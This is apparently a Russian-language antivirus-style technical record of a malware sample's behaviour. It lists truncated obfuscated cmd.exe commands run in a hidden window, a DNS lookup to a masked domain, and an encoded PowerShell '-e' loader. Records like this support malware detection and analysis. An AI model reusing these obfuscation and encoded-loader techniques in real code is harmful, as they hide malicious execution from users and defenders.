Техническая информация
- '<SYSTEM32>\cmd.exe' iRdvabffVA vTzBiOwiGJATardjFPiDA YQmMHpGJPl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %tdBipKuBNzRUQJU%=zwaGSzvwblsB&&set %RkbCFwi%=p&&set %XuaIJsVDufwuYw%=o...
- DNS ASK gq###w81qw.com
- '<SYSTEM32>\cmd.exe' iRdvabffVA vTzBiOwiGJATardjFPiDA YQmMHpGJPl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %tdBipKuBNzRUQJU%=zwaGSzvwblsB&&set %RkbCFwi%=p&&set %XuaIJsVDufwuYw%=o...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFMASABFAGwATABpAEQAWwAxAF0AKwAkAFMAaABFAGwATABJAEQAWwAxADMAXQArACcAWAAnACkAKAAgAE4ARQBXAC0AbwBCAGoARQBjAFQAIABJAE8ALgBjAE8ATQBwAFIARQBTAHMASQBvAG4ALgBkAEUARgBMAEEAVABlAHMAdAByAE...